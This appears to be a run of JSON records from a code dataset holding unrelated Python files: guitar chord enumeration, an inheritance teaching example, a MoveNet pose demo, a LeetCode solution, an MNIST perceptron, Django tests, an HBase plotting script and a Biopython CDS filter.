Given a collection of notes to be played simultaneously,\n generate all \"sane\" chord configurations.\n\n Sane chord configurations are allocations of notes to frets\n where the same string is not used twice and the total stretch\n does not exceed five frets (although open strings are always\n allowed).\n\n The location of open strings is indicated by `capo` and obviously\n no positions below that position can be used.\n\n Note that some of the chords generated may still be unplayable.\n For instance, several A5 chords with the A and the E in the fifth\n octave can be generated with an open high E string.\n Arguably, this is playable with the A on any but the E strings\n because one can apply string muting.\n Therefore, it is difficult to come up with a full algorithmic\n description of what is and what is not playable.\n \"\"\"\n LOG.debug(\"Finding sane chords for {n}\".format(n=notes))\n chord_tree = _sane_chord_tree(list(notes), capo)\n if chord_tree:\n return _depth_first(chord_tree)\n\n\ndef _depth_first(chord_tree, ancestors=None):\n r\"\"\"\n Traverse a chord tree in depth-first manner.\n\n For each path down the tree, an immutable set which represents\n a \"flattened\" path is yielded.\n \"\"\"\n if not ancestors:\n ancestors = []\n nodes = chord_tree.keys()\n if not nodes:\n yield frozenset(ancestors)\n else:\n for node in nodes:\n for result in _depth_first(chord_tree[node], ancestors + [node]):\n yield result\n \n\ndef _sane_chord_tree(notes, capo, ancestors=None):\n r\"\"\"\n Given an ordered collection of notes to be played simultaneously,\n return a tree structure representing all possible configurations.\n \"\"\"\n LOG.debug('Chord tree notes: {notes}'.format(notes=notes))\n if not ancestors:\n ancestors = []\n result = {}\n if not _is_sane_configuration(ancestors, capo):\n return None\n if not notes:\n return result\n for position in frets(notes[0]):\n family = ancestors + [position]\n subtree = 
_sane_chord_tree(notes[1:], capo, family)\n if subtree is not None:\n result[position] = subtree\n if result:\n return result\n\ndef _is_sane_configuration(positions, capo, stretch=5):\n r\"\"\"\n Given a collection of fretboard positions, determine whether it\n seems possible to play them all as one chord.\n >>> _is_sane_configuration([(0, ('E', 2)), (2, ('A', 3))], capo=0)\n True\n \"\"\"\n strings_encountered = set()\n min_fret = None\n max_fret = None\n for position in positions:\n if position[0] < capo or position[1] in strings_encountered:\n return False\n if position[0] > capo:\n if not min_fret:\n # min and max are equal initially\n min_fret, max_fret = position[0], position[0]\n else:\n min_fret = min(min_fret, position[0])\n max_fret = max(max_fret, position[0])\n if max_fret - min_fret > stretch:\n return False\n strings_encountered.add(position[1])\n return True\n\n\ndef physical2theoretical_chord(physical):\n r\"\"\"\n Given the physical representation of a chord,\n return the theoretical representation.\n\n >>> physical2theoretical_chord({4: 7})\n Counter({('E', 3): 1})\n \"\"\"\n result = Counter()\n for string_num in physical.keys():\n note = fret2note(physical[string_num], string_num)\n result[note] += 1\n return result\n","sub_path":"pyngwie/notemappings.py","file_name":"notemappings.py","file_ext":"py","file_size_in_byte":9278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"423829690","text":"class Aparelho:\r\n #Construtor\r\n def __init__(self, marca, estado):\r\n self.__marca = marca\r\n self.__estado = estado\r\n \r\n def getMarca(self):\r\n return self.__marca\r\n \r\n def isEmQueEstado(self):\r\n return self.__estado\r\n \r\n #Métodos de instância\r\n def ligaAparelho(self):\r\n if self.__estado == True:\r\n print('Já estava ligado(a)!')\r\n else:\r\n self.__estado = True\r\n print('Ligado(a) com sucesso!')\r\n \r\n def desligaAparelho(self):\r\n if self.__estado == False:\r\n print('Já estava desligado(a)!')\r\n else:\r\n self.__estado = False\r\n print('Desligado(a) com sucesso!')\r\n \r\nclass Televisao(Aparelho):\r\n #Construtor\r\n def __init__(self, marca, estado, volume):\r\n #Chama construtor da superclasse\r\n super().__init__(marca, estado) \r\n self.__volume = volume\r\n \r\n def isEmQueVolume(self):\r\n return self.__volume\r\n \r\n #Métodos de instância\r\n def aumentaVolume(self):\r\n if self.__volume == True:\r\n print('O volume ja esta alto!')\r\n else:\r\n self.__volume = True\r\n print('O volume foi aumentado!')\r\n \r\n def abaixaVolume(self):\r\n if self.__volume == False:\r\n print('O volume ja esta baixo!')\r\n else:\r\n self.__volume = False\r\n print('O volume foi abaixado!')\r\n\r\n def mostraAtributos(self):\r\n print('A tv é da marca {}.'.format(self.getMarca()))\r\n if(self.isEmQueEstado()):\r\n print('A tv esta ligada.')\r\n else:\r\n print('A tv esta desligada.')\r\n if(self.isEmQueVolume()):\r\n print('O volume esta alto.')\r\n else:\r\n print('O volume esta baixo.')\r\n\r\nclass Celular(Aparelho):\r\n #Construtor\r\n def __init__(self, marca, estado, whatsappAberto):\r\n #Chama construtor da superclasse\r\n super().__init__(marca, estado)\r\n self.__whatsappAberto = whatsappAberto\r\n \r\n def isWhatsappAberto(self):\r\n return self.__whatsappAberto\r\n \r\n #Métodos de instância\r\n def abreWhatsapp(self):\r\n if self.__whatsappAberto == True:\r\n print('O whatsapp ja estava aberto! 
Tem varias pessoas no vácuo!')\r\n else:\r\n self.__whatsappAberto = True\r\n print('O whatsapp acaba de ser aberto. Há mensagens não lidas!')\r\n \r\n def fechaWhatsapp(self):\r\n if self.__whatsappAberto == False:\r\n print('O whatsapp ja estava fechado!')\r\n else:\r\n self.__whatsappAberto = False\r\n print('O whatsapp acaba de ser fechado!')\r\n \r\n def mostraAtributos(self):\r\n print('O celular é da marca {}.'.format(self.getMarca()))\r\n if(self.isEmQueEstado()):\r\n print('O celular esta ligado.')\r\n else:\r\n print('O celular esta desligado.')\r\n if(self.isWhatsappAberto()):\r\n print('O whatsapp esta aberto. Há mensagens não lidas!')\r\n else:\r\n print('O whatsapp esta fechado.')\r\n\r\nT = Televisao('Philips', False, False)\r\nT.mostraAtributos()\r\nprint(\"\"\"---------------------\r\nTentando ligar a tv e aumentar seu volume:\"\"\")\r\nT.ligaAparelho()\r\nT.aumentaVolume()\r\nprint(\"\"\"---------------------\r\nResultado após as mudanças:\"\"\")\r\nT.mostraAtributos()\r\nprint(\"\"\"---------------------\r\nTentando abaixar o volume da tv e depois desligá-la:\"\"\")\r\nT.abaixaVolume()\r\nT.desligaAparelho()\r\nprint(\"\"\"---------------------\r\nResultado após as mudanças:\"\"\")\r\nT.mostraAtributos()\r\nprint('-----------------------')\r\nC = Celular('Moto G 6', True, True)\r\nC.mostraAtributos()\r\nprint(\"\"\"---------------------\r\nTentando ligar o celular e abrir seu whatsapp:\"\"\")\r\nC.ligaAparelho()\r\nC.abreWhatsapp()\r\nprint(\"\"\"---------------------\r\nResultado após as mudanças:\"\"\")\r\nC.mostraAtributos()\r\nprint(\"\"\"---------------------\r\nTentando fechar o whatsapp do celular e depois desligá-lo:\"\"\")\r\nC.fechaWhatsapp()\r\nC.desligaAparelho()\r\nprint(\"\"\"---------------------\r\nResultado após as mudanças:\"\"\")\r\nC.mostraAtributos()","sub_path":"classes-and-attributes/2-heritages/1-Aparelho.py","file_name":"1-Aparelho.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"551684297","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport copy\nimport time\nimport argparse\n\nimport cv2 as cv\nimport numpy as np\nimport tensorflow as tf\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--device\", type=int, default=0)\n parser.add_argument(\"--file\", type=str, default=None)\n parser.add_argument(\"--width\", help='cap width', type=int, default=960)\n parser.add_argument(\"--height\", help='cap height', type=int, default=540)\n\n parser.add_argument('--mirror', action='store_true')\n\n parser.add_argument(\"--model_select\", type=int, default=0)\n parser.add_argument(\"--keypoint_score\", type=float, default=0.4)\n\n args = parser.parse_args()\n\n return args\n\n\ndef run_inference(interpreter, input_size, image):\n image_width, image_height = image.shape[1], image.shape[0]\n\n # 前処理\n input_image = cv.resize(image, dsize=(input_size, input_size)) # リサイズ\n input_image = cv.cvtColor(input_image, cv.COLOR_BGR2RGB) # BGR→RGB変換\n input_image = input_image.reshape(-1, input_size, input_size, 3) # リシェイプ\n input_image = tf.cast(input_image, dtype=tf.uint8) # uint8へキャスト\n\n # 推論\n input_details = interpreter.get_input_details()\n interpreter.set_tensor(input_details[0]['index'], input_image.numpy())\n interpreter.invoke()\n\n output_details = interpreter.get_output_details()\n keypoints_with_scores = interpreter.get_tensor(output_details[0]['index'])\n keypoints_with_scores = 
np.squeeze(keypoints_with_scores)\n\n # キーポイント、スコア取り出し\n keypoints = []\n scores = []\n for index in range(17):\n keypoint_x = int(image_width * keypoints_with_scores[index][1])\n keypoint_y = int(image_height * keypoints_with_scores[index][0])\n score = keypoints_with_scores[index][2]\n\n keypoints.append([keypoint_x, keypoint_y])\n scores.append(score)\n\n return keypoints, scores\n\n\ndef main():\n # 引数解析 #################################################################\n args = get_args()\n cap_device = args.device\n cap_width = args.width\n cap_height = args.height\n\n if args.file is not None:\n cap_device = args.file\n\n mirror = args.mirror\n model_select = args.model_select\n keypoint_score_th = args.keypoint_score\n\n # カメラ準備 ###############################################################\n cap = cv.VideoCapture(cap_device)\n cap.set(cv.CAP_PROP_FRAME_WIDTH, cap_width)\n cap.set(cv.CAP_PROP_FRAME_HEIGHT, cap_height)\n\n # モデルロード #############################################################\n if model_select == 0:\n model_path = 'tflite/lite-model_movenet_singlepose_lightning_tflite_float16_4.tflite'\n input_size = 192\n elif model_select == 1:\n model_path = 'tflite/lite-model_movenet_singlepose_thunder_tflite_float16_4.tflite'\n input_size = 256\n elif model_select == 2:\n model_path = 'tflite/lite-model_movenet_singlepose_lightning_tflite_int8_4.tflite'\n input_size = 192\n elif model_select == 3:\n model_path = 'tflite/lite-model_movenet_singlepose_thunder_tflite_int8_4.tflite'\n input_size = 256\n else:\n sys.exit(\n \"*** model_select {} is invalid value. Please use 0-3. ***\".format(\n model_select))\n\n interpreter = tf.lite.Interpreter(model_path=model_path)\n interpreter.allocate_tensors()\n\n while True:\n start_time = time.time()\n\n # カメラキャプチャ #####################################################\n ret, frame = cap.read()\n if not ret:\n break\n if mirror:\n frame = cv.flip(frame, 1) # ミラー表示\n debug_image = copy.deepcopy(frame)\n\n # 検出実施 ##############################################################\n keypoints, scores = run_inference(\n interpreter,\n input_size,\n frame,\n )\n\n elapsed_time = time.time() - start_time\n\n # デバッグ描画\n debug_image = draw_debug(\n debug_image,\n elapsed_time,\n keypoint_score_th,\n keypoints,\n scores,\n )\n\n # キー処理(ESC:終了) ##################################################\n key = cv.waitKey(1)\n if key == 27: # ESC\n break\n\n # 画面反映 #############################################################\n cv.imshow('MoveNet(singlepose) Demo', debug_image)\n\n cap.release()\n cv.destroyAllWindows()\n\n\ndef draw_debug(\n image,\n elapsed_time,\n keypoint_score_th,\n keypoints,\n scores,\n):\n debug_image = copy.deepcopy(image)\n\n # 0:鼻 1:左目 2:右目 3:左耳 4:右耳 5:左肩 6:右肩 7:左肘 8:右肘 # 9:左手首\n # 10:右手首 11:左股関節 12:右股関節 13:左ひざ 14:右ひざ 15:左足首 16:右足首\n # Line:鼻 → 左目\n index01, index02 = 0, 1\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:鼻 → 右目\n index01, index02 = 0, 2\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左目 → 左耳\n index01, index02 = 1, 3\n if scores[index01] > keypoint_score_th and scores[\n index02] > 
keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:右目 → 右耳\n index01, index02 = 2, 4\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:鼻 → 左肩\n index01, index02 = 0, 5\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:鼻 → 右肩\n index01, index02 = 0, 6\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左肩 → 右肩\n index01, index02 = 5, 6\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左肩 → 左肘\n index01, index02 = 5, 7\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左肘 → 左手首\n index01, index02 = 7, 9\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:右肩 → 右肘\n index01, index02 = 6, 8\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:右肘 → 右手首\n index01, index02 = 8, 10\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左股関節 → 右股関節\n index01, index02 = 11, 12\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左肩 → 左股関節\n index01, index02 = 5, 11\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左股関節 → 左ひざ\n index01, index02 = 11, 13\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, 
point02, (0, 0, 0), 2)\n # Line:左ひざ → 左足首\n index01, index02 = 13, 15\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:右肩 → 右股関節\n index01, index02 = 6, 12\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:右股関節 → 右ひざ\n index01, index02 = 12, 14\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:右ひざ → 右足首\n index01, index02 = 14, 16\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n\n # Circle:各点\n for keypoint, score in zip(keypoints, scores):\n if score > keypoint_score_th:\n cv.circle(debug_image, keypoint, 6, (255, 255, 255), -1)\n cv.circle(debug_image, keypoint, 3, (0, 0, 0), -1)\n\n # 処理時間\n cv.putText(debug_image,\n \"Elapsed Time : \" + '{:.1f}'.format(elapsed_time * 1000) + \"ms\",\n (10, 30), cv.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255), 4,\n cv.LINE_AA)\n cv.putText(debug_image,\n \"Elapsed Time : \" + '{:.1f}'.format(elapsed_time * 1000) + \"ms\",\n (10, 30), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2,\n cv.LINE_AA)\n\n return debug_image\n\n\nif __name__ == '__main__':\n main()","sub_path":"demo_singlepose_tflite.py","file_name":"demo_singlepose_tflite.py","file_ext":"py","file_size_in_byte":12192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"547048763","text":"\"\"\"\nSuppose you have a random list of people standing in a queue.\nEach person is described by a pair of integers (h, k), where h is the height of the person and k is the number of people\nin front of this person who have a height greater than or equal to h. Write an algorithm to reconstruct the queue.\nNote:\nThe number of people is less than 1,100.\n\nExample\n\nInput:\n[[7,0], [4,4], [7,1], [5,0], [6,1], [5,2]]\n\nOutput:\n[[5,0], [7,0], [5,2], [6,1], [4,4], [7,1]]\n\"\"\"\npeople = [[5,0], [6,1], [7,0], [4,4], [7,1], [5,2]]\ndef reconstructQueue(people):\n res = []\n for p in sorted((-x[0], x[1]) for x in people):\n res.insert(p[1], [-p[0], p[1]])\n return res\n\n\"\"\"\nExplanation and solution from @SergeyTachenov:\nImagine you only had the tallest people. Then the you would sort them based on the second index,\nsince they only see themselves and themselves only. e.g. [[7, 0], [7, 1], ... 
]\nThen the next tallest group, and the second index would indicate exactly where they should be.\nand so on and on.\nThe second part was confusing at first, but playing with it and writing it down on paper made it easier to understand.\n\n\"\"\"","sub_path":"406.py","file_name":"406.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"123793197","text":"#create a perceptron!\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nclass Perceptron:\n #constructor here\n def __init__(self, input_size, learning_rate, my_label):#first parameter of any class method is self\n self.input_size = input_size\n self.learning_rate = learning_rate\n self.my_label = my_label\n #create rand weight values matrix\n self.weight_vector = np.random.uniform(low=(-.05), high=.05, size=(input_size+1,))\n\n def train(self, input_vector, target):\n # insert bias (input, indice, valueinserted,axis-optional\n input_vector = np.insert(input_vector, 0, 1, axis=0)\n #compute\n sum_value = 0\n if (np.dot(self.weight_vector, input_vector) > 0):\n #update weight vector\n sum_value = 1\n #compare to target\n if(sum_value != target):\n #update weights taking in target and value \n #with inline anonymous function\n update_funct = lambda w, x_in: w + x_in*(self.learning_rate * (target - sum_value))\n #update a single weight\n vector_function = np.vectorize(update_funct)#can take in lambda or function\n #does the vector function on the entire vector\n self.weight_vector = vector_function(self.weight_vector, input_vector)\n\n def test(self, input_vector):\n #insert bias\n input_vector = np.insert(input_vector, 0, 1, axis=0)\n return np.dot(self.weight_vector, input_vector)\n\n\nclass TrainClassifier:\n def __init__(self, input_size, learning_rate, num_classes):\n self.perceptron_list = []\n for index in range(num_classes):\n #create labels using index\n self.perceptron_list.append(Perceptron(input_size, learning_rate, index))\n\n def train_classifier_vector(self, input_vector, label):\n #is it labeled correctly\n for perceptron in self.perceptron_list:\n #compute target\n target = 1 if label == perceptron.my_label else 0\n perceptron.train(input_vector, target)\n\n\n def train_classifier_dataset(self, input_matrix, label_vector):\n #shuffle list\n zipped_data = list(zip(input_matrix,label_vector))\n np.random.shuffle(zipped_data)\n #for each row\n for input_vector,label in zipped_data:\n self.train_classifier_vector(input_vector, label)\n\n #return a predicted label\n def classify_vector(self, input_vector):\n #list comprehension--\n predictions = [(perceptron.test(input_vector),perceptron.my_label) for perceptron in self.perceptron_list]\n print(predictions)\n\n# def test_classifier_dataset(\n\n#read data\n#split in to labels and input_matrix \n#give to train_classifier\n\n#python for main method:\nif __name__ == \"__main__\":\n\n # Create matrices of data\n train_data = pd.read_csv(\"data/mnist_train.csv\", header=None).values\n test_data = pd.read_csv(\"data/mnist_test.csv\", header=None).values\n\n# transpose_train = train_data.transpose()\n# print(transpose_train)\n\n train_labels = train_data[:,0]\n test_labels = test_data[:,0]\n\n train_data = np.delete(train_data, 0, axis=1)\n test_data = np.delete(test_data, 0, axis=1)\n\n train_classifier = TrainClassifier(784, .01, 10)\n\n train_classifier.train_classifier_dataset(train_data, 
train_labels)\n\n\n\n\n","sub_path":"digit_classifier_NN.py","file_name":"digit_classifier_NN.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"319029982","text":"from django.test import TestCase\nfrom catalog.models import Mineral\n\n\nclass MineralModelTests(TestCase):\n \"\"\"Test the Mineral model.\"\"\"\n def setUp(self):\n Mineral.objects.create(\n name=\"Axinite\",\n image_filename=\"Axinite.jpg\",\n streak=\"White to greyish white\",\n group='Silicates'\n )\n Mineral.objects.create(\n name=\"Barstowite\",\n image_filename=\"Barstowite.jpg\",\n streak=\"White to brownish\",\n group='Organic Minerals'\n )\n\n def test_mineral_name(self):\n \"\"\"Test mineral name is set correctly\"\"\"\n axinite = Mineral.objects.get(name='Axinite')\n barstowite = Mineral.objects.get(name='Barstowite')\n self.assertEqual(str(axinite), 'Axinite')\n self.assertEqual(str(barstowite), 'Barstowite')\n\n def test_mineral_group(self):\n \"\"\"Test mineral group is set correctly\"\"\"\n axinite = Mineral.objects.get(name='Axinite')\n barstowite = Mineral.objects.get(name='Barstowite')\n self.assertEqual(axinite.group, 'Silicates')\n self.assertEqual(barstowite.group, 'Organic Minerals')","sub_path":"catalog/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"177392066","text":"import happybase\r\nimport pandas as pd\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\n\r\nimport numpy as np\r\nimport matplotlib.units as munits\r\nimport matplotlib.dates as mdates\r\n\r\nimport datetime\r\nfrom matplotlib.dates import DateFormatter\r\n# converter = mdates.ConciseDateConverter()\r\n# munits.registry[np.datetime64] = converter\r\n# munits.registry[datetime.date] = converter\r\n# munits.registry[datetime.datetime] = converter\r\n\r\n\r\ndef connect(tname):\r\n CONNECTION = happybase.Connection('104.154.17.226', 9090)\r\n CONNECTION.open()\r\n # print(CONNECTION.tables())\r\n\r\n _table = CONNECTION.table(tname)\r\n print(_table)\r\n return _table\r\n\r\n\r\ntable = connect('pilot')\r\n\r\nxs = []\r\nys = []\r\n\r\n\r\n# for (key, data) in table.scan(limit=10):\r\n# print(key, data)\r\n\r\n# d = [(a, b, c) for a, (b, c) in l]\r\ndf = pd.DataFrame(table.scan(), columns=['date','countries'])\r\ndd = df.countries.apply(pd.Series)\r\n# print(\"aaa\", dd)\r\n\r\nmetas = pd.DataFrame({'col':[\r\n b'country:US', \r\n b'country:CN',\r\n b'country:JP',\r\n b'country:UK',\r\n b'country:KR',\r\n ], \r\n 'title':['US', 'CN', 'JP', 'UK', 'KR'] } )\r\n\r\ndf2 = pd.concat(\r\n [\r\n df.drop(['countries'], axis=1),\r\n df.countries.apply(pd.Series)\r\n ], axis=1)\r\n\r\nprint(df2)\r\n\r\ndef test():\r\n df[\"date\"] = pd.to_datetime(df[\"date\"].str.decode(\"utf-8\"))\r\n print(df)\r\n\r\n\r\n# # for i in metas.columns[1:]:\r\n# # for name, values in df.iteritems():\r\n\r\ndef plot():\r\n plt.style.use('fivethirtyeight')\r\n\r\n fig, ax = plt.subplots()\r\n\r\n # ax.xaxis.set_major_formatter(DateFormatter('%m-%d'))\r\n\r\n # lims = [(np.datetime64('2005-02'), np.datetime64('2005-04')),\r\n # (np.datetime64('2005-02-03'), np.datetime64('2005-02-15')),\r\n # (np.datetime64('2005-02-03 11:00'), np.datetime64('2005-02-04 13:20'))]\r\n\r\n\r\n # locator = mdates.AutoDateLocator(minticks=3, maxticks=7)\r\n # xfmt = mdates.DateFormatter('%Y-%m-%d')\r\n # 
ax.xaxis.set_major_formatter(xfmt)\r\n # ax.xaxis.set_major_locator(locator)\r\n # formatter = mdates.ConcseDateFormatter(locator)\r\n # ax.xaxis.set_major_formatter(formatter)\r\n # for i in \r\n # print(type(metas.col))\r\n for (index, row) in metas.iterrows():\r\n colName = row['col']\r\n # print(row['col'], row['id'])\r\n if colName in df2:\r\n print(colName)\r\n # print(df2[colName])\r\n # plt.plot(df2['date'].apply(lambda x:x[4:6]+b'/'+x[6:8]) , df2[colName].fillna(\"0\"), label=row['title'])\r\n # print(\"----\", colName)\r\n # print( df2['date'], df2[colName].apply(lambda x:), row['title'])\r\n # ax.plot(b'date', b'country:CN', data=df2)\r\n cases = df2[colName].str.decode(\"utf-8\").fillna(\"0\").apply(lambda x: int(x))\r\n debug(cases)\r\n cases = np.cumsum(cases)\r\n debug(cases)\r\n # print(cases)\r\n # for i in cases:\r\n # print(type(i))\r\n # int.from_bytes(b'y\\xcc\\xa6\\xbb', byteorder='big')\r\n dates = pd.to_datetime(df2['date'].str.decode(\"utf-8\"))\r\n # dates = [datetime.datetime.strptime(d, '%Y-%m-%d') for d in dates]\r\n \r\n # int.from_bytes(b'y\\xcc\\xa6\\xbb', byteorder='big')\r\n ax.plot(dates, cases , label=row['title'] )\r\n \r\n # break\r\n\r\n\r\n plt.legend(loc='upper left')\r\n plt.tight_layout()\r\n plt.show()\r\n\r\n# for column in metas:\r\n# print(metas[column])\r\n # for i in metas[column]\r\n # print(i)\r\n\r\n# for name, values in metas.iteritems():\r\n# print('{name}: {value}'.format(name=name, value=values))\r\n\r\n\r\n\r\n\r\ndef debug(col):\r\n print(col)\r\n for i in col:\r\n print(i)\r\n\r\n# for p in meta.index\r\n\r\n# plt.legend(loc='upper left')\r\n# plt.tight_layout()\r\n\r\n\r\nplot()","sub_path":"proj/plot/test copy.py","file_name":"test copy.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"23672616","text":"#!/usr/bin/python\n\n# Collect the cds seq of high quality for each OG group\n\nfrom Bio import SeqIO\nimport os\nimport argparse\n\n'''\nprosource1 = '/home/luhongzhong/protein_all_align_s2_R/'\ncdssource2 = '/home/luhongzhong/cds_all/'\noutputfile = '/home/luhongzhong/cds_all_refine/'\n\nfile1 = prosource1 + 'OG5327_aa_aligned.fasta'\nfile2 = cdssource2 + 'OG5327_code.fasta'\nfile3 = outputfile + 'OG5327_code.fasta'\n'''\n\ndef filterCDS(cds_input, OG_input, cds_output):\n cds = list(SeqIO.parse(cds_input, \"fasta\"))\n try:\n OG_trim = list(SeqIO.parse(OG_input, \"fasta\"))\n proteinID = []\n for record in OG_trim:\n print(record.id, len(list(record.seq)))\n proteinID.append(record.id)\n cds_new = []\n for cds0 in cds:\n print(cds0.id)\n if cds0.id in proteinID:\n cds_new.append(cds0)\n SeqIO.write(cds_new, cds_output, \"fasta\")\n except:\n pass\n print(\"No refined OG could be found!\")\n\n\n\n# for the batch process\n# the code file is stored in the document file\ndef main():\n parser = argparse.ArgumentParser(\n formatter_class = argparse.RawDescriptionHelpFormatter,\n description = 'Collect the cds seq of high quality for each OG group')\n #adding arguments\n parser.add_argument('-n', metavar='input_file', type=str, help='input the cds seq before trim')\n parser.add_argument('-p1', metavar = 'input_file', type = str, help = 'input the protein seq after trim')\n parser.add_argument('-o', metavar = 'output_file', type = str, help = 'output file to store the new protein seq')\n #parser.add_argument('-o', metavar='output_file', type=str, help='output file to store the result')\n\n args = parser.parse_args()\n cdsfile = args.n\n 
profile = args.p1 # store the cds in phy format\n outfile = args.o # store the code\n # for the test\n cds_list = os.listdir(cdsfile)\n for ele in cds_list:\n print(ele)\n cds0 = cdsfile + ele\n if \"code\" in ele: # this is for 343 yeast species genome annotation\n pro0 = profile + ele.replace(\"code\", \"aa_aligned\") # for non-pruned protein fasta file\n #pro0 = profile + ele.replace(\"_code.fasta\", \"_aa_aligned.fasta_pruned.fa\") # for pruned fasta file\n else: # this is for 1011 sce genomes annotation\n pro0 = profile + ele.replace(\".fasta\", \"_aa_aligned.fasta\")\n output0 = outfile + ele\n try:\n filterCDS(cds_input=cds0, OG_input=pro0, cds_output=output0)\n except: pass\nif __name__ == \"__main__\":\n main()\n\n# an example\n# python os.mkdir(\"/home/luhongzhong/cds_all_refine/\")\n# python A2_extract_cds_from_align_protein.py -n /home/luhongzhong/cds_all/ -p1 /home/luhongzhong/protein_all_align_s2_R/ -o /home/luhongzhong/cds_all_refine/","sub_path":"evolution_analysis/code/code_align/A2_extract_cds_from_align_protein.py","file_name":"A2_extract_cds_from_align_protein.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"640061958","text":"\"\"\"\nTime:2019/11/6 0006\n\"\"\"\nimport unittest\n\nfrom libs.ddt import ddt, data\n\nfrom scripts.handle_excel import HandleExcel\nfrom scripts.handle_log import lt\nfrom scripts.handle_conf import 